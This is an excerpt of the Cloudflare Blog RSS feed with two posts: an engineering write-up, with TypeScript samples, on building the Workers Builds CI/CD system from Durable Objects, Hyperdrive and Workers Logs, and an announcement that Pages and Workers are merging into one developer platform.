
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Sat, 04 Apr 2026 13:31:05 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Workers Builds: integrated CI/CD built on the Workers platform]]></title>
            <link>https://blog.cloudflare.com/workers-builds-integrated-ci-cd-built-on-the-workers-platform/</link>
            <pubDate>Thu, 31 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Workers Builds, an integrated CI/CD pipeline for the Workers platform, recently launched in open beta. We walk through how we built this product on Cloudflare’s Developer Platform. ]]></description>
            <content:encoded><![CDATA[ <p>During 2024’s Birthday Week, we <a href="https://blog.cloudflare.com/builder-day-2024-announcements/#continuous-integration-and-delivery"><u>launched Workers Builds</u></a> in open beta — an integrated <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">Continuous Integration and Delivery (CI/CD) </a>workflow you can use to build and deploy everything from full-stack applications built with the most popular frameworks to simple static websites onto the Workers platform. With Workers Builds, you can connect a GitHub or GitLab repository to a Worker, and Cloudflare will automatically build and deploy your changes each time you push a commit.</p><p>Workers Builds is intended to bridge the gap between the developer experiences for Workers and Pages, the latter of which <a href="https://blog.cloudflare.com/cloudflare-pages/"><u>launched with an integrated CI/CD system in 2020</u></a>. As we continue to <a href="https://blog.cloudflare.com/pages-and-workers-are-converging-into-one-experience/"><u>merge the experiences of Pages and Workers</u></a>, we wanted to bring one of the best features of Pages to Workers: the ability to tie deployments to existing development workflows in GitHub and GitLab with minimal developer overhead. </p><p>In this post, we’re going to share how we built the Workers Builds system on Cloudflare’s Developer Platform, using <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a>, <a href="https://developers.cloudflare.com/durable-objects"><u>Durable Objects</u></a>, <a href="https://developers.cloudflare.com/hyperdrive"><u>Hyperdrive</u></a>, <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>Workers Logs</u></a>, and <a href="https://developers.cloudflare.com/workers/configuration/smart-placement"><u>Smart Placement</u></a>.</p>
    <div>
      <h2>The design problem</h2>
      <a href="#the-design-problem">
        
      </a>
    </div>
    <p>The core problem for Workers Builds is how to pick up a commit from GitHub or GitLab and start a containerized job that can clone the repo, build the project, and deploy a Worker. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6n6UCIKAM4uAtWzsRBiS16/1c0b655b415afe375b6b153ada570357/BLOG-2594_2.png" />
          </figure><p>Pages solves a similar problem, and we were initially inclined to expand our existing architecture and tech stack, which includes a centralized configuration plane built on Go in Kubernetes. We also considered the ways in which the Workers ecosystem has evolved in the four years since Pages launched — we have since launched so many more tools built for use cases just like this! </p><p>The distributed nature of Workers offers some advantages over a centralized stack — we can spend less time configuring Kubernetes because Workers automatically handles failover and scaling. Ultimately, we decided to keep using what required no additional work to re-use from Pages (namely, the system for connecting GitHub/GitLab accounts to Cloudflare, and ingesting push events from them), and for the rest build out a new architecture on the Workers platform, with reliability and minimal latency in mind.</p>
    <div>
      <h2>The Workers Builds system</h2>
      <a href="#the-workers-builds-system">
        
      </a>
    </div>
    <p>We didn’t need to make any changes to the system that handles connections from GitHub/GitLab to Cloudflare and ingesting push events from them. That left us with two systems to build: the configuration plane for users to connect a Worker to a repo, and a build management system to run and monitor builds.</p>
    <div>
      <h3>Client Worker </h3>
      <a href="#client-worker">
        
      </a>
    </div>
    <p>We can begin with our configuration plane, which consists of a simple Client Worker that implements a RESTful API (using <a href="https://hono.dev/docs/getting-started/cloudflare-workers"><u>Hono</u></a>) and connects to a PostgreSQL database. It’s in this database that we store build configurations for our users, and through this Worker that users can view and manage their builds. </p><p>We use a <a href="https://developers.cloudflare.com/hyperdrive/"><u>Hyperdrive binding</u></a> to connect to our database <a href="https://developers.cloudflare.com/hyperdrive/configuration/connect-to-private-database"><u>securely over Cloudflare Access</u></a> (which also manages connection pooling and query caching).</p><p>We considered a more distributed data model (like <a href="https://developers.cloudflare.com/d1/"><u>D1</u></a>, sharded by account), but ultimately decided that keeping our database in a datacenter more easily fit our use-case. The Workers Builds data model is relational — Workers belong to Cloudflare Accounts, and Builds belong to Workers — and build metadata must be consistent in order to properly manage build queues. We chose to keep our failover-ready database in a centralized datacenter and take advantage of two other Workers products, Smart Placement and Hyperdrive, in order to keep the benefits of a distributed control plane. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33eYqRr5LXKbAvfP8RR7X7/b82858c39b9755c6e056577c9449b00f/BLOG-2594_3.png" />
          </figure><p>Everything that you see in the Cloudflare Dashboard related to Workers Builds is served by this Worker. </p>
    <div>
      <h3>Build Management Worker</h3>
      <a href="#build-management-worker">
        
      </a>
    </div>
    <p>The more challenging problem we faced was how to run and manage user builds effectively. We wanted to support the same experience that we had achieved with Pages, which led to these key requirements:</p><ol><li><p>Builds should be initiated with minimal latency.</p></li><li><p>The status of a build should be tracked and displayed through its entire lifecycle, starting when a user pushes a commit.</p></li><li><p>Customer build logs should be stored in a secure, private, and long-lived way.</p></li></ol><p>To solve these problems, we leaned heavily into the technology of <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a> (DO). </p><p>We created a Build Management Worker with two DO classes: A Scheduler class to manage the scheduling of builds, and a class called BuildBuddy to manage individual builds. We chose to design our system this way for an efficient and scalable system. Since each build is assigned its own build manager DO, its operation won’t ever block other builds or the scheduler, meaning we can start up builds with minimal latency. Below, we dive into each of these Durable Objects classes.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6RUDJI7IYIlzcX4qjF9EYY/7e959b7a4489a41d275d74d634389f31/BLOG-2594_4.png" />
          </figure>
    <div>
      <h4>Scheduler DO</h4>
      <a href="#scheduler-do">
        
      </a>
    </div>
    <p>The Scheduler DO class is relatively simple. Using <a href="https://developers.cloudflare.com/durable-objects/api/alarms/"><u>Durable Objects Alarms</u></a>, it is triggered every second to pull up a list of user build configurations that are ready to be started. For each of those builds, the Scheduler creates an instance of our other DO Class, the Build Buddy. </p>
            <pre><code>import { DurableObject } from 'cloudflare:workers'


export class BuildScheduler extends DurableObject {
   state: DurableObjectState
   env: Bindings


   constructor(ctx: DurableObjectState, env: Bindings) {
       super(ctx, env)
   }
   
   // The DO alarm handler will be called every second to fetch builds
   async alarm(): Promise&lt;void&gt; {
// set alarm to run again in 1 second
       await this.updateAlarm()


       const builds = await this.getBuildsToSchedule()
       await this.scheduleBuilds(builds)
   }


   async scheduleBuilds(builds: Builds[]): Promise&lt;void&gt; {
       // Don't schedule builds, if no builds to schedule
       if (builds.length === 0) return


       const queue = new PQueue({ concurrency: 6 })
       // Begin running builds
       builds.forEach((build) =&gt;
           queue.add(async () =&gt; {
       	  // The BuildBuddy is another DO described more in the next section! 
               const bb = getBuildBuddy(this.env, build.build_id)
               await bb.startBuild(build)
           })
       )


       await queue.onIdle()
   }


   async getBuildsToSchedule(): Promise&lt;Builds[]&gt; {
       // returns list of builds to schedule
   }


   async updateAlarm(): Promise&lt;void&gt; {
// We want to ensure we aren't running multiple alarms at once, so we only set the next alarm if there isn’t already one set. 
       const existingAlarm = await this.ctx.storage.getAlarm()
       if (existingAlarm === null) {
           this.ctx.storage.setAlarm(Date.now() + 1000)
       }
   }
}
</code></pre>
            
    <div>
      <h4>Build Buddy DO</h4>
      <a href="#build-buddy-do">
        
      </a>
    </div>
    <p>The Build Buddy DO class is what we use to manage each individual build from the time it begins initializing to when it is stopped. Every build has a buddy for life!</p><p>Upon creation of a Build Buddy DO instance, the Scheduler immediately calls <code>startBuild()</code> on the instance. The <code>startBuild()</code> method is responsible for fetching all metadata and secrets needed to run a build, and then kicking off a build on Cloudflare’s container platform (<a href="https://blog.cloudflare.com/container-platform-preview/"><u>not public yet, but coming soon</u></a>!). </p><p>As the containerized build runs, it reports back to the Build Buddy, sending status updates and logs for the Build Buddy to deal with. </p>
    <div>
      <h5>Build status</h5>
      <a href="#build-status">
        
      </a>
    </div>
    <p>As a build progresses, it reports its own status back to Build Buddy, sending updates when it has finished initializing, has completed successfully, or been terminated by the user. The Build Buddy is responsible for handling this incoming information from the containerized build, writing status updates to the database (via a Hyperdrive binding) so that users can see the status of their build in the Cloudflare dashboard.</p>
    <div>
      <h5>Build logs</h5>
      <a href="#build-logs">
        
      </a>
    </div>
    <p>A running build generates output logs that are important to store and surface to the user. The containerized build flushes these logs to the Build Buddy every second, which, in turn, stores those logs in <a href="https://developers.cloudflare.com/durable-objects/api/storage-api/"><u>DO storage</u></a>. </p><p>The decision to use Durable Object storage here makes it easy to multicast logs to multiple clients efficiently, and allows us to use the same API for both streaming logs and viewing historical logs. </p><p>// build-management-app.ts</p>
            <pre><code>// We created a Hono app to for use by our Client Worker API
const app = new Hono&lt;HonoContext&gt;()
   .post(
       '/api/builds/:build_uuid/status',
       async (c) =&gt; {
           const buildStatus = await c.req.json()


           // fetch build metadata
           const build = ...


           const bb = getBuildBuddy(c.env, build.build_id)
           return await bb.handleStatusUpdate(build, statusUpdate)
       }
   )
   .post(
       '/api/builds/:build_uuid/logs',
       async (c) =&gt; {
           const logs = await c.req.json()
     // fetch build metadata
           const build = ...


           const bb = getBuildBuddy(c.env, build.build_id)
           return await bb.addLogLines(logs.lines)
       }
   )


export default {
   fetch: app.fetch
}
</code></pre>
            <p>// build-buddy.ts</p>
            <pre><code>import { DurableObject } from 'cloudflare:workers'


export class BuildBuddy extends DurableObject {
   compute: WorkersBuildsCompute


   constructor(ctx: DurableObjectState, env: Bindings) {
       super(ctx, env)
       this.compute = new ComputeClient({
           // ...
       })
   }


   // The Scheduler DO calls startBuild upon creating a BuildBuddy instance
   startBuild(build: Build): void {
       this.startBuildAsync(build)         
   }


   async startBuildAsync(build: Build): Promise&lt;void&gt; {
       // fetch all necessary metadata build, including
	// environment variables, secrets, build tokens, repo credentials, 
// build image URI, etc
	// ...


	// start a containerized build
       const computeBuild = await this.compute.createBuild({
           // ...
       })
   }


   // The Build Management worker calls handleStatusUpdate when it receives an update
   // from the containerized build
   async handleStatusUpdate(
       build: Build,
       buildStatusUpdatePayload: Payload
   ): Promise&lt;void&gt; {
// Write status updates to the database
   }


   // The Build Management worker calls addLogLines when it receives flushed logs
   // from the containerized build
   async addLogLines(logs: LogLines): Promise&lt;void&gt; {
       // Generate nextLogsKey to store logs under      
       this.ctx.storage.put(nextLogsKey, logs)
   }


   // The Client Worker can call methods on a Build Buddy via RPC, using a service binding to the Build Management Worker.
   // The getLogs method retrieves logs for the user, and the cancelBuild method forwards a request from the user to terminate a build. 
   async getLogs(cursor: string){
       const decodedCursor = cursor !== undefined ? decodeLogsCursor(cursor) : undefined
       return await this.getLogs(decodedCursor)
   }


   async cancelBuild(compute_id: string, build_id: string): void{
      await this.terminateBuild(build_id, compute_id)
   }


   async terminateBuild(build_id: number, compute_id: string): Promise&lt;void&gt; {
       await this.compute.stopBuild(compute_id)
   }
}


   export function getBuildBuddy(
   env: Pick&lt;Bindings, 'BUILD_BUDDY'&gt;,
   build_id: number
): DurableObjectStub&lt;BuildBuddy&gt; {
   const id = env.BUILD_BUDDY.idFromName(build_id.toString())
   return env.BUILD_BUDDY.get(id)
}
</code></pre>
            
    <div>
      <h5>Alarms</h5>
      <a href="#alarms">
        
      </a>
    </div>
    <p>We utilize <a href="https://developers.cloudflare.com/durable-objects/api/alarms/"><u>alarms</u></a> in the Build Buddy to check that a build has a healthy startup and to terminate any builds that run longer than 20 minutes. </p>
    <div>
      <h2>How else have we leveraged the Developer Platform?</h2>
      <a href="#how-else-have-we-leveraged-the-developer-platform">
        
      </a>
    </div>
    <p>Now that we've gone over the core behavior of the Workers Builds control plane, we'd like to detail a few other features of the Workers platform that we use to improve performance, monitor system health, and troubleshoot customer issues.</p>
    <div>
      <h3>Smart Placement and location hints</h3>
      <a href="#smart-placement-and-location-hints">
        
      </a>
    </div>
    <p>While our control plane is distributed in the sense that it can be run across multiple datacenters, to reduce latency costs, we want most requests to be served from locations close to our primary database in the western US.</p><p>While a build is running, Build Buddy, a Durable Object, is continuously writing status updates to our database. For the Client and the Build Management API Workers, we enabled <a href="https://developers.cloudflare.com/workers/configuration/smart-placement/"><u>Smart Placement</u></a> with <a href="https://developers.cloudflare.com/durable-objects/reference/data-location/#provide-a-location-hint"><u>location hints</u></a> to ensure requests run close to the database.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hhFLpYizLZ6cyu4h80YL8/40af67320a6bf44f375d6055b2997a99/BLOG-2594_5.png" />
          </figure><p>This graph shows the reduction in round trip time (RTT) observed for our Worker with Smart Placement turned on. </p>
    <div>
      <h3>Workers Logs</h3>
      <a href="#workers-logs">
        
      </a>
    </div>
    <p>We needed a logging tool that allows us to aggregate and search across persistent operational logs from our Workers to assist with identifying and troubleshooting issues. We worked with the Workers Observability team to become early adopters of <a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs"><u>Workers Logs</u></a>.</p><p>Workers Logs worked out of the box, giving us fast and easy to use logs directly within the Cloudflare dashboard. To improve our ability to search logs, we created a <a href="https://www.npmjs.com/package/workers-tagged-logger"><u>tagging library</u></a> that allows us to easily add metadata like the git tag of the deployed worker that the log comes from, allowing us to filter logs by release.</p><p>See a shortened example below for how we handle and log errors on the Client Worker. </p><p>// client-worker-app.ts</p>
            <pre><code>// The Client Worker is a RESTful API built with Hono
const app = new Hono&lt;HonoContext&gt;()
   // This is from the workers-tagged-logger library - first we register the logger
   .use(useWorkersLogger('client-worker-app'))
   // If any error happens during execution, this middleware will ensure we log the error
   .onError(useOnError)
   // routes
   .get(
       '/apiv4/builds',
       async (c) =&gt; {
           const { ids } = c.req.query()
           return await getBuildsByIds(c, ids)
       }
   )


function useOnError(e: Error, c: Context&lt;HonoContext&gt;): Response {
   // Set the project identifier n the error
   logger.setTags({ release: c.env.GIT_TAG })
 
   // Write a log at level 'error'. Can also log 'info', 'log', 'warn', and 'debug'
   logger.error(e)
   return c.json(internal_error.toJSON(), internal_error.statusCode)
}
</code></pre>
            <p>This setup can lead to the following sample log message from our Workers Log dashboard. You can see the release tag is set on the log.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gfd725NCFNrhlDt3gK515/90138c159285e91535a986266918be13/BLOG-2594_6.png" />
          </figure><p>We can get a better sense of the impact of the error by adding filters to the Workers Logs view, as shown below. We are able to filter on any of the fields since we’re <a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs#logging-structured-json-objects"><u>logging with structured JSON</u></a>.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6XqXINluVzzyHd4O17JsnZ/0ac714792a4d21623b4a875291ae0ad0/BLOG-2594_7.png" />
          </figure>
    <div>
      <h3>R2</h3>
      <a href="#r2">
        
      </a>
    </div>
    <p>Coming soon to Workers Builds is build caching, used to store artifacts of a build for subsequent builds to reuse, such as package dependencies and build outputs. Build caching can speed up customer builds by avoiding the need to redownload dependencies from NPM or to rebuild projects from scratch. The cache itself will be backed by <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2 storage</a>. </p>
    <div>
      <h3>Testing</h3>
      <a href="#testing">
        
      </a>
    </div>
    <p>We were able to build up a great testing story using <a href="https://blog.cloudflare.com/workers-vitest-integration/"><u>Vitest and workerd</u></a> — unit tests, cross-worker integration tests, the works. In the example below, we make use of the <code>runInDurableObject</code> stub from <code>cloudflare:test</code> to test instance methods on the Scheduler DO directly.</p><p>// scheduler.spec.ts</p>
            <pre><code>import { env, runInDurableObject } from 'cloudflare:test'
import { expect, test } from 'vitest'
import { BuildScheduler } from './scheduler'


test('getBuildsToSchedule() runs a queued build', async () =&gt; {
   // Our test harness creates a single build for our scheduler to pick up
   const { build } = await harness.createBuild()


   // We create a scheduler DO instance
   const id = env.BUILD_SCHEDULER.idFromName(crypto.randomUUID())
   const stub = env.BUILD_SCHEDULER.get(id)
   await runInDurableObject(stub, async (instance: BuildScheduler) =&gt; {
       expect(instance).toBeInstanceOf(BuildScheduler)


// We check that the scheduler picks up 1 build
       const builds = await instance.getBuildsToSchedule()
       expect(builds.length).toBe(1)
	
// We start the build, which should mark it as running
       await instance.scheduleBuilds(builds)
   })


   // Check that there are no more builds to schedule
   const queuedBuilds = ...
   expect(queuedBuilds.length).toBe(0)
})
</code></pre>
            <p>We use <code>SELF.fetch()</code> from <code>cloudflare:test</code> to run integration tests on our Client Worker, as shown below. This integration test covers our Hono endpoint and database queries made by the Client Worker in retrieving the metadata of a build.</p><p>// builds_api.test.ts</p>
            <pre><code>import { env, SELF } from 'cloudflare:test'
   
it('correctly selects a single build', async () =&gt; {
   // Our test harness creates a randomized build to test with
   const { build } = await harness.createBuild()


   // We send a request to the Client Worker itself to fetch the build metadata
   const getBuild = await SELF.fetch(
       `https://example.com/builds/${build1.build_uuid}`,
       {
           method: 'GET',
           headers: new Headers({
               Authorization: `Bearer JWT`,
               'content-type': 'application/json',
           }),
       }
   )


   // We expect to receive a 200 response from our request and for the 
   // build metadata returned to match that of the random build that we created
   expect(getBuild.status).toBe(200)
   const getBuildV4Resp = await getBuild.json()
   const buildResp = getBuildV4Resp.result
   expect(buildResp).toBeTruthy()
   expect(buildResp).toEqual(build)
})
</code></pre>
            <p>These tests run on the same runtime that Workers run on in production, meaning we have greater confidence that any code changes will behave as expected when they go live. </p>
    <div>
      <h3>Analytics</h3>
      <a href="#analytics">
        
      </a>
    </div>
    <p>We use the technology underlying the <a href="https://developers.cloudflare.com/analytics/analytics-engine/"><u>Workers Analytics Engine</u></a> to collect all of the metrics for our system. We set up <a href="https://developers.cloudflare.com/analytics/analytics-engine/grafana/"><u>Grafana</u></a> dashboards to display these metrics. </p>
    <div>
      <h3>JavaScript-native RPC</h3>
      <a href="#javascript-native-rpc">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/javascript-native-rpc/"><u>JavaScript-native RPC</u></a> was added to Workers in April of 2024, and it’s pretty magical. In the scheduler code example above, we call <code>startBuild()</code> on the BuildBuddy DO from the Scheduler DO. Without RPC, we would need to stand up routes on the BuildBuddy <code>fetch()</code> handler for the Scheduler to trigger with a fetch request. With RPC, there is almost no boilerplate — all we need to do is call a method on a class. </p>
            <pre><code>const bb = getBuildBuddy(this.env, build.build_id)


// Starting a build without RPC 😢
await bb.fetch('http://do/api/start_build', {
    method: 'POST',
    body: JSON.stringify(build),
})


// Starting a build with RPC 😸
await bb.startBuild(build)
</code></pre>
            
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>By using Workers and Durable Objects, we were able to build a complex and distributed system that is easy to understand and is easily scalable. </p><p>It’s been a blast for our team to build on top of the very platform that we work on, something that would have been much harder to achieve on Workers just a few years ago. We believe in being Customer Zero for our own products — to identify pain points firsthand and to continuously improve the developer experience by applying them to our own use cases. It was fulfilling to have our needs as developers met by other teams and then see those tools quickly become available to the rest of the world — we were collaborators and internal testers for Workers Logs and private network support for Hyperdrive (both released on Birthday Week), and the soon to be released container platform.</p><p>Opportunities to build complex applications on the Developer Platform have increased in recent years as the platform has matured and expanded product offerings for more use cases. We hope that Workers Builds will be yet another tool in the Workers toolbox that enables developers to spend less time thinking about configuration and more time writing code. </p><p>Want to try it out? Check out the <a href="https://developers.cloudflare.com/workers/ci-cd/builds/"><u>docs</u></a> to learn more about how to deploy your first project with Workers Builds.</p> ]]></content:encoded>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">6uKjGQLUKCb33wGIcOQE1Y</guid>
            <dc:creator>Serena Shah-Simpson</dc:creator>
            <dc:creator>Jacob Hands</dc:creator>
            <dc:creator>Natalie Rogers</dc:creator>
        </item>
        <item>
            <title><![CDATA[Bringing a unified developer experience to Cloudflare Workers and Pages]]></title>
            <link>https://blog.cloudflare.com/pages-and-workers-are-converging-into-one-experience/</link>
            <pubDate>Wed, 17 May 2023 13:00:48 GMT</pubDate>
            <description><![CDATA[ Today we’re excited to announce that over the next year we will be working to bring together the best traits and attributes you know and love from each product into one powerful platform!  ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PeofAYkofLOlbvWxKSbyp/0103898bf22da7dbe8e70e7705f32d43/image4-13.png" />
            
            </figure><p>Today, we’re thrilled to announce that Pages and Workers will be joining forces into one singular product experience!</p><p>We’ve all been there. In a surge of creativity, you visualize in your head the application you want to build so clearly with the pieces all fitting together – maybe a server side rendered frontend and an SQLite database for your backend. You head to your computer with the wheels spinning. You know you can build it, you just need the right tools. You log in to your Cloudflare dashboard, but then you’re faced with an incredibly difficult decision:</p><p><i>Cloudflare Workers or Pages?</i></p><p>Both seem so similar at a glance but also different in the details, so which one is going to make your idea become a reality? What if you choose the wrong one? What are the tradeoffs between the two? These are questions our users should never have to think about, but the reality is, they often do. Speaking with our wide community of users and customers, we hear it ourselves! Decision paralysis hits hard when choosing between Pages and Workers with both products made to build out serverless applications.</p><p>In short, we don’t want this for our users — especially when you’re on the verge of a great idea – no, a big idea. That’s why we’re excited to show off the first milestone towards bringing together the best of both beloved products — Workers and Pages into <b>one powerful development platform!</b> This is the beginning of the journey towards a shared fate between the two products, so we wanted to take the opportunity to tell you why we were doing this, what you can use today, and what’s next.</p>
    <div>
      <h2>More on the “why”</h2>
      <a href="#more-on-the-why">
        
      </a>
    </div>
    <p>The relationship between Pages and Workers has always been intertwined. Up until today, we always looked at the two as siblings — each having their own distinct characteristics but both allowing their respective users to <a href="https://www.cloudflare.com/developer-platform/solutions/hosting/">build rich and powerful applications</a>. Each product targeted its own set of use cases.</p><p>Workers first started as a way to extend our <a href="https://www.cloudflare.com/learning/cdn/what-is-a-cdn/">CDN</a> and then expanded into a highly configurable general purpose compute platform. Pages first started as a static web hosting that expanded into <a href="https://www.cloudflare.com/learning/performance/what-is-jamstack/">Jamstack</a> territory. Over time, Pages began acquiring more of Workers' powerful compute features, while Workers began adopting the rich developer features introduced by Pages. The lines between these two products blurred, making it difficult for our users to understand the differences and pick the right product for their application needs.</p><p>We know we can do better to help alleviate this decision paralysis and help you move fast throughout your development experience.</p>
    <div>
      <h2>Cool, but what do you mean?</h2>
      <a href="#cool-but-what-do-you-mean">
        
      </a>
    </div>
    <p>Instead of being forced to make tradeoffs between these two products, we want to bring you the best of the both worlds: a single development platform that has both powerful compute and superfast static asset hosting – that seamlessly integrates with our portfolio of storage products like <a href="https://www.cloudflare.com/developer-platform/r2/">R2</a>, Queues, D1, and others, and provides you with rich tooling like <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD</a>, git-ops workflows, live previews, and flexible environment configurations.</p>
    <div>
      <h3>All the details in one place</h3>
      <a href="#all-the-details-in-one-place">
        
      </a>
    </div>
    <p>Today, a lot of our developers use both Pages and Workers to build pieces of their applications. However, they still live in separate parts of the Cloudflare dashboard and don’t always translate from one to the other, making it difficult to combine and keep track of your app’s stack. While we’re still vision-boarding the look and feel, we’re planning a world where users have the ability to manage all of their applications in one central place.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZPV9OB9b2zjePkxRGefek/57cedd3e2ee1d701bdd8aca2334dd134/image1-44.png" />
            
            </figure><p>No more scrambling all over the dashboard to find the pieces of your application – you’ll have all the information you need about a project right at your fingertips.</p>
    <div>
      <h3>Primitives</h3>
      <a href="#primitives">
        
      </a>
    </div>
    <p>With Pages and Workers converging, we’ll also be redefining the concept of a “project” , introducing a new blank canvas of possibilities to plug and play. Within a project, you will be able to add (1) static assets, (2) serverless functions (Workers), (3) resources or (4) any combination of each.</p><p>To unlock the full potential of your application, we’re exploring project capabilities that allow you to auto-provision and directly integrate with resources like KV, Durable Objects, R2 and D1. With the possibility of all of these primitives on a project, more importantly, you'll be able to safely perform rollbacks and previews, as we'll keep the versions of your assets, functions and resources in sync with every deployment. No need to worry about any of them becoming stale on your next deployment.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/74kTM29cuEOsePnmglreAA/fd4c9e7c9a62aad15c07dd7bf2ef3430/image5-8.png" />
            
            </figure>
    <div>
      <h3>Deployments</h3>
      <a href="#deployments">
        
      </a>
    </div>
    <p>One of Pages’ most notable qualities is its git-ops centered deployments. In our converged world, you’ll be able to optionally connect, build and deploy git repos that contain any combination of static assets, serverless functions and bindings to resources, as well as take advantage of the same high-performance CI system that exists in Pages today.</p><p>Like Pages, you will be able to preview deployments of your project with unique URLs protected by Cloudflare Access, available in your PRs or via Wrangler command. Because we know that great ideas take lots of vetting before the big release, we’ll also have a first-class concept of environments to enable testing in different setups.</p>
    <div>
      <h3>Local development</h3>
      <a href="#local-development">
        
      </a>
    </div>
    <p>Arguably one of the most important parts to consider is our local development story in a post-converged world. This developer experience should be no different from how we’re converging the products. In the future, as you work with our Wrangler CLI, you can expect a unified and predictable set of commands to use on your project – e.g. a simple <code>wrangler dev</code> and <code>wrangler deploy</code>. Using a configuration file that applies to your entire project along with all of its components, you can have the confidence that your command will act on the entire project – not just pieces of it!</p>
    <div>
      <h2>What are the benefits?</h2>
      <a href="#what-are-the-benefits">
        
      </a>
    </div>
    <p>With Workers and Pages converging, we’re not just unlocking all the golden developer features of each product into one development platform. We’re bringing all the performance, cost and load benefits too. This includes:</p><ul><li><p><b>Super low latency</b> with globally distributed static assets and compute on our network that is just 50ms away from 95% of Internet-connected world-wide population.</p></li><li><p><b>Free egress</b> and also free static asset hosting.</p></li><li><p><b>Standards-based JavaScript runtime</b> with seamless compatibility across the packages and libraries you're already familiar with.</p></li></ul>
    <div>
      <h2>Seamless migrations for all</h2>
      <a href="#seamless-migrations-for-all">
        
      </a>
    </div>
    <p>If you’re already a Pages or Workers user and are starting to get nervous about what this means for your existing projects – never fear. As we build out this merged architecture, seamless migration is our top priority and the North Star for every step on the way to a unified development platform. Existing projects on both Pages and Workers will continue to work without users needing to lift a finger. Instead, you'll see more and more features become available to enrich your existing projects and workflows, regardless of the product you started with.</p>
    <div>
      <h2>What’s new today?</h2>
      <a href="#whats-new-today">
        
      </a>
    </div>
    <p>We’ll be working over the next year to converge Pages and Workers into one singular experience, blending not only the products themselves but also our product, engineering and design teams behind the scenes.</p><p>While we can’t wait to welcome you to the new converged world, this change unfortunately won’t happen overnight. We’re planning to hit some big but incremental milestones over the next few quarters to ensure a smooth transition into convergence, and this Developer Week, we’re excited to take our first step toward convergence. In the dashboard, things might feel a bit different!</p>
    <div>
      <h3>Get started together</h3>
      <a href="#get-started-together">
        
      </a>
    </div>
    <p>Combining the onboarding experience for Pages and Workers into one flow, you’ll notice some changes on our dashboard when you’re creating a project. We’re slowly bringing the two products closer together by unifying the creation flow giving you access to create either a Pages project or Worker from one screen.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1puZCEGhC57tvtVrZelPxQ/7a2dce2d00e60a04494c2877e0c78ebb/image2-25.png" />
            
            </figure>
    <div>
      <h3>Go faster with templates</h3>
      <a href="#go-faster-with-templates">
        
      </a>
    </div>
    <p>We understand the classic developer urge to immediately get hands dirty and hit the ground running on their big vision. We’re making it easier than ever to go from an idea to an application that’s live on the Cloudflare network. In a couple of clicks, you can deploy a starter template, ranging from a simple Hello World Worker to a ChatGPT plugin. In the future, we’re working on Pages templates in our dashboard, allowing you to automatically create a new repo and deploy starter full-stack apps with a couple of buttons.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3rE4bQXXGIVLL1GJHRwp7K/689712caa64a9898a9e1d1cec23f9530/image6-8.png" />
            
            </figure>
    <div>
      <h3>Your favorite full stack frameworks at your fingertips</h3>
      <a href="#your-favorite-full-stack-frameworks-at-your-fingertips">
        
      </a>
    </div>
    <p>We're not stopping with static templates or our dashboard either. Bringing the framework of your choice doesn't mean you have to leave behind the tools you already know and love. If you’re itching to see just what we mean when we say “deploy with your favorite full-stack framework” or “check out the power of Workers”, simply execute:</p>
            <pre><code>npm create cloudflare@latest</code></pre>
            <p>from your terminal and enjoy the ride! This <a href="/making-cloudflare-for-web">new CLI experience integrates</a> with CLIs from some of our first class and solidly supported full-stack frameworks like Angular, Next, Qwik and Remix giving you full control of how you create new projects. From this tool you can also deploy a variety of Workers using our powerful starter templates, with a wizard-like experience.</p><div></div>
<p></p>
    <div>
      <h3>One singular place to find all of your applications</h3>
      <a href="#one-singular-place-to-find-all-of-your-applications">
        
      </a>
    </div>
    <p>We’re taking one step closer to a unified experience by merging the Pages and Workers project list dashboards together. Once you’ve deployed your application, you’ll notice all of your Pages and Workers on one page, so you don’t have to navigate to different parts of your dashboard. Track your usage analytics for Workers / Pages Functions in one spot. In the future, these cards won’t be identifiable as Pages and Workers – just “projects” with a combination of assets, functions and resources!</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ecIiaeqYcjq16PZ0zuHu8/961af03314a1308f9deedd301a007fe4/image3-14.png" />
            
            </figure>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
